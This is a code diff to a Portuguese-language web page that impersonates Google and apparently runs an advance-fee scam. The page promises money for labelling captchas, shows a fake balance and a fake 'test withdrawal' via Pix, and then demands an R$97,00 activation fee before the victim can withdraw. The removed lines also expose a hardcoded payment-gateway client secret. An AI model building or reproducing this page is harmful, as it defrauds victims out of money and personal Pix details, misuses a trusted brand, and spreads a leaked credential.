--- a/index.html
+++ b/index.html
@@ -144,102 +144,6 @@
     <link rel="dns-prefetch" href="https://api.vturb.com.br">
 </head>
 <body>
-    <div class="container" id="page1">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="saldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <h2 style="font-size: 21px;">Parabéns, você foi selecionado!</h2>
-            <p>O Google Captchas precisa de você para aumentar a segurança dos seus sites analisando se os Captchas estão marcados corretamente ou incorretamente.</p>
-            <p>Você acaba de receber acesso à nova ferramenta do Google para análise de Captchas. <b>Aproveite, você já ganhou R$100,00</b>!</p>
-            <p>Complete 7 Tarefas Simples e realize seu primeiro saque em minutos.</p>
-            <p>Complete o Captcha para Começar a sua Primeira Tarefa.</p>
-        </div>
-        <div class="captcha">
-            <div class="g-recaptcha" data-sitekey="6LeFvSEqAAAAAIn7IAxAsaJMtpLyjo4DmINrfEU9" data-callback="recaptchaCallback"></div>
-        </div>
-        <button class="btn" id="startButton" disabled>Começar Agora</button>
-        <div class="error" id="errorMessage"></div>
-    </div>
-
-    <div class="container" id="page2" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="taskSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="progresso" id="progresso">
-            Tarefa 1 de 7
-        </div>
-        <div class="task-value" id="taskValue">Valor da Tarefa: R$15,00</div>
-        <div class="content">
-            <p id="taskText">Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém veículos.</p>
-        </div>
-        <picture>
-            <source id="taskImageWebp" type="image/webp">
-            <source id="taskImagePng" type="image/png">
-            <img id="taskImage" alt="Captcha com veículos">
-        </picture>
-        <div class="progress-bar">
-            <div class="progress-bar-fill" id="progressBarFill">0%</div>
-        </div>
-        <button class="btn btn-green" id="yesButton">Sim</button>
-        <button class="btn btn-red" id="noButton">Não</button>
-        <div class="error" id="errorMessagePage2"></div>
-    </div>
-
-    <div class="container" id="tasksCompletedPage" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="completedSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <img src="assets/img/verificado.png" alt="Verificado" style="max-width: 70px; margin: 0 auto; display: block;">
-            <h2 style="font-size: 21px; text-align: center;">Tarefas Concluídas!</h2>
-            <p>Parabéns, as tarefas foram concluídas com sucesso! Agora, assista um rápido vídeo para estar podendo realizar o seu saque de forma imediata.</p>
-            <p>Toque no botão abaixo para assistir o vídeo e realizar o seu saque.</p>
-        </div>
-        <button class="btn btn-green" id="goToVideoButton">Assistir Vídeo</button>
-    </div>
-
-    <div class="container" id="pageFinal" style="display: none;">
-        <picture>
-            <source srcset="assets/img/img1.webp" type="image/webp">
-            <source srcset="assets/img/img1.png" type="image/png">
-            <img src="assets/img/img1.png" alt="Google Captchas">
-        </picture>
-        <div class="saldo" id="finalSaldo">
-            Saldo: R$100,00
-        </div>
-        <div class="content">
-            <p>O saque será liberado ao final deste vídeo! Assista e entenda como funciona o Google Captcha e porque você está sendo pago para melhorar a segurança de nossa ferramenta.</p>
-            <div id="vid_663fd09d62dd4d000b35368e" style="position:relative;width:100%;padding: 177.77777777777777% 0 0;">
-                <img id="thumb_663fd09d62dd4d000b35368e" src="https://images.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/thumbnail.jpg" style="position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover;display:block;">
-                <div id="backdrop_663fd09d62dd4d000b35368e" style="position:absolute;top:0;width:100%;height:100%;-webkit-backdrop-filter:blur(5px);backdrop-filter:blur(5px);"></div>
-            </div>
-            <script type="text/javascript" id="scr_663fd09d62dd4d000b35368e">
-                var s=document.createElement("script");
-                s.src="https://scripts.converteai.net/35808f69-9b9a-479d-a83c-7e4ac709ac71/players/663fd09d62dd4d000b35368e/player.js", s.async=!0,document.head.appendChild(s);
-            </script>
-            <style>
-                .elementor-element:has(#smartplayer) { width: 100%; }
-            </style>
-            <button class="btn btn-green" id="withdrawButton" style="display:none;">Realizar Saque Agora</button>
-        </div>
-    </div>
-
     <div class="container" id="withdrawPage" style="display: none;">
         <picture>
             <source srcset="assets/img/img1.webp" type="image/webp">
@@ -266,6 +170,50 @@
         </div>
     </div>
 
+    <div class="container" id="confirmationPage" style="display: none;">
+        <picture>
+            <source srcset="assets/img/img1.webp" type="image/webp">
+            <source srcset="assets/img/img1.png" type="image/png">
+            <img src="assets/img/img1.png" alt="Google Captchas">
+        </picture>
+        <div class="saldo" id="confirmationSaldo">
+            Saldo: R$99,95
+        </div>
+        <div class="content">
+            <img src="assets/img/verificado.png" alt="Verificado" style="max-width: 70px; margin: 0 auto; display: block;">
+            <h2 style="font-size: 21px; text-align: center;">Saque de Teste</h2>
+            <p>Para confirmar que a chave pix foi digitada corretamente, enviamos um valor entre R$0,01 a R$0,10 para a sua conta bancária da chave pix que foi inserida anteriormente. Confirme abaixo o valor que foi recebido para receber sua comissão total na participação do Treinamento do Google Captcha.</p>
+            <form id="testConfirmationForm">
+                <label for="receivedAmount">Valor Recebido:</label>
+                <input type="text" id="receivedAmount" name="receivedAmount" required placeholder="R$0,00">
+                <button type="submit" class="btn btn-green">Confirmar Saque</button>
+            </form>
+            <div class="error" id="confirmationErrorMessage"></div>
+        </div>
+    </div>
+
+    <div class="container" id="successPage" style="display: none;">
+        <picture>
+            <source srcset="assets/img/img1.webp" type="image/webp">
+            <source srcset="assets/img/img1.png" type="image/png">
+            <img src="assets/img/img1.png" alt="Google Captchas">
+        </picture>
+        <div class="saldo" id="successSaldo">
+            Saldo: R$99,95
+        </div>
+        <div class="content">
+            <img src="assets/img/verificado.png" alt="Verificado" style="max-width: 70px; margin: 0 auto; display: block;">
+            <h2 style="font-size: 21px; text-align: center;">Saque Confirmado!</h2>
+            <p>Parabéns. O seu saque foi confirmado com sucesso!</p>
+            <p>Agora falta apenas um passo! Você agora, só precisa ter uma conta no Programa Google Captcha Collaboration para estar podendo sacar o saldo total das suas comissões acumuladas.</p>
+            <p>É cobrado uma pequena taxa de inscrição de R$97,00 para cada usuário que será acrescentado no saldo para saque.</p>
+            <p>O cobrado é apenas para ativar sua <b>nova conta</b> no Programa Google Captcha Collaboration.</p>
+            <p>As demais tarefas realizadas, não serão cobradas taxas! Pelo fato de você já possuir uma conta ativa em nossa plataforma.</p>
+            <p>Para criar sua conta e efetuar o pagamento da taxa para ativação da sua conta no Programa Google Captcha Collaboration, toque no botão abaixo.</p>
+            <button class="btn btn-green">Criar Conta</button>
+        </div>
+    </div>
+
     <div class="popup" id="popup">
         <img id="popupIcon" src="" alt="Icon">
         <p id="popupText"></p>
@@ -273,148 +221,36 @@
     
     <script src="https://www.google.com/recaptcha/api.js"></script>
     <script>
-        const tasks = [
-            { imageWebp: 'assets/img/captcha1.webp', imagePng: 'assets/img/captcha1.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém veículos.', answer: 'sim' },
-            { imageWebp: 'assets/img/captcha2.webp', imagePng: 'assets/img/captcha2.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém pessoas.', answer: 'sim' },
-            { imageWebp: 'assets/img/captcha3.webp', imagePng: 'assets/img/captcha3.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém casas.', answer: 'não' },
-            { imageWebp: 'assets/img/captcha4.webp', imagePng: 'assets/img/captcha4.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém motocicletas.', answer: 'sim' },
-            { imageWebp: 'assets/img/captcha5.webp', imagePng: 'assets/img/captcha5.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém animais.', answer: 'não' },
-            { imageWebp: 'assets/img/captcha6.webp', imagePng: 'assets/img/captcha6.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém semáforos.', answer: 'sim' },
-            { imageWebp: 'assets/img/captcha7.webp', imagePng: 'assets/img/captcha7.png', text: 'Tarefa: Visualize a imagem abaixo e informe se nos blocos marcados contém barcos.', answer: 'não' },
-        ];
-        let currentTask = 0;
         let saldo = 100.00;
 
-        function updateTask() {
-            if (currentTask < tasks.length) {
-                const task = tasks[currentTask];
-                document.getElementById('taskImageWebp').srcset = task.imageWebp;
-                document.getElementById('taskImagePng').srcset = task.imagePng;
-                document.getElementById('taskImage').src = task.imagePng;
-                document.getElementById('taskText').innerText = task.text;
-                document.getElementById('progresso').innerText = `Tarefa ${currentTask + 1} de ${tasks.length}`;
-                document.getElementById('taskSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-                let taskValue = (saldo * 0.15).toFixed(2);
-                document.getElementById('taskValue').innerText = `Valor da Tarefa: R$${taskValue}`;
-                updateProgressBar();
-            } else {
-                document.getElementById('page2').style.display = 'none';
-                document.getElementById('completedSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-                document.getElementById('tasksCompletedPage').style.display = 'block';
-                new Audio('assets/audio/ok.mp3').play();
-            }
+        function formatCurrency(value) {
+            value = value.replace(/\D/g, "");
+            value = (value / 100).toFixed(2) + '';
+            value = value.replace(".", ",");
+            value = "R$ " + value;
+            return value;
         }
-
-        function updateProgressBar() {
-            const progress = ((currentTask + 1) / tasks.length) * 100;
-            const progressBarFill = document.getElementById('progressBarFill');
-            progressBarFill.style.width = `${progress}%`;
-            progressBarFill.innerText = `${progress.toFixed(0)}%`;
-        }
-
-        function showPopup(message, icon, isCorrect) {
-            const popup = document.getElementById('popup');
-            const popupText = document.getElementById('popupText');
-            const popupIcon = document.getElementById('popupIcon');
-            popupText.innerText = message;
-            popupIcon.src = icon;
-            popup.className = isCorrect ? 'popup popup-correct' : 'popup popup-wrong';
-            popup.style.display = 'block';
-            setTimeout(() => {
-                popup.style.display = 'none';
-            }, 3000);
-        }
-
-        function recaptchaCallback() {
-            document.getElementById('startButton').disabled = false;
-            document.getElementById('startButton').classList.add('btn-green');
-            new Audio('assets/audio/ok.mp3').play();
-        }
-
-        document.getElementById('startButton').addEventListener('click', function() {
-            if (grecaptcha.getResponse() === '') {
-                document.getElementById('errorMessage').innerText = 'Por favor, conclua o captcha antes de continuar.';
-            } else {
-                document.getElementById('page1').style.display = 'none';
-                document.getElementById('page2').style.display = 'block';
-                updateTask();
-            }
-        });
-
-        function validateAnswer(answer) {
-            const correct = tasks[currentTask].answer;
-            let message = '';
-            let icon = '';
-            if (answer === correct) {
-                const commission = (saldo * 0.15).toFixed(2);
-                saldo = parseFloat(saldo) + parseFloat(commission);
-                new Audio('assets/audio/dinheiro.mp3').play();
-                message = `Resposta Correta! Comissão de R$${commission} foi adicionada ao seu saldo, agora você tem R$${saldo.toFixed(2)}.`;
-                icon = 'assets/img/verificado.png';
-                showPopup(message, icon, true);
-            } else {
-                new Audio('assets/audio/erro.mp3').play();
-                message = `Resposta Errada! Comissão foi adicionada ao seu saldo, agora você tem R$${saldo.toFixed(2)}.`;
-                icon = 'assets/img/verificado.png';
-                showPopup(message, icon, false);
-            }
-            document.getElementById('taskSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-            currentTask++;
-            updateTask();
-        }
-
-        document.getElementById('yesButton').addEventListener('click', function() {
-            validateAnswer('sim');
-        });
-
-        document.getElementById('noButton').addEventListener('click', function() {
-            validateAnswer('não');
-        });
-
-        document.getElementById('goToVideoButton').addEventListener('click', function() {
-            document.getElementById('tasksCompletedPage').style.display = 'none';
-            document.getElementById('pageFinal').style.display = 'block';
-            setTimeout(() => {
-                document.getElementById('withdrawButton').style.display = 'block';
-            }, 60000); // 1 minuto
-        });
-
-        document.getElementById('withdrawButton').addEventListener('click', function() {
-            document.getElementById('pageFinal').style.display = 'none';
-            document.getElementById('withdrawPage').style.display = 'block';
-            document.getElementById('withdrawSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
-        });
 
         document.getElementById('pixForm').addEventListener('submit', function(event) {
             event.preventDefault();
-            const pixKey = document.getElementById('pixKey').value;
-            const pixType = document.getElementById('pixType').value;
-            const data = {
-                client_id: 'wjmkt_1713979947271',
-                client_secret: '49d8d1419abe58357fa6ec5d4e562b302c6c661df14ff8b745b6b3376df4cb4c3478cd59160d456791aa555dcae974ee',
-                key_pix: pixKey,
-                key_type: pixType,
-                value: saldo.toFixed(2),
-            };
+            // Implementação da lógica para enviar o Pix e redirecionar para a página de confirmação
+            document.getElementById('withdrawPage').style.display = 'none';
+            saldo -= 0.05;
+            document.getElementById('confirmationSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
+            document.getElementById('confirmationPage').style.display = 'block';
+        });
 
-            fetch('https://sandbox.ws.suitpay.app/api/v1/gateway/pix-payment', {
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json',
-                },
-                body: JSON.stringify(data),
-            })
-            .then(response => response.json())
-            .then(data => {
-                if (data.success) {
-                    alert('Pagamento realizado com sucesso!');
-                } else {
-                    document.getElementById('pixErrorMessage').innerText = 'Erro ao realizar o pagamento. Tente novamente.';
-                }
-            })
-            .catch((error) => {
-                document.getElementById('pixErrorMessage').innerText = 'Erro ao realizar o pagamento. Tente novamente.';
-            });
+        document.getElementById('receivedAmount').addEventListener('input', function(event) {
+            event.target.value = formatCurrency(event.target.value);
+        });
+
+        document.getElementById('testConfirmationForm').addEventListener('submit', function(event) {
+            event.preventDefault();
+            // Lógica para confirmar o saque e redirecionar para a página de sucesso
+            document.getElementById('confirmationPage').style.display = 'none';
+            document.getElementById('successSaldo').innerText = `Saldo: R$${saldo.toFixed(2)}`;
+            new Audio('assets/audio/ok.mp3').play();
+            document.getElementById('successPage').style.display = 'block';
         });
     </script>
 </body>
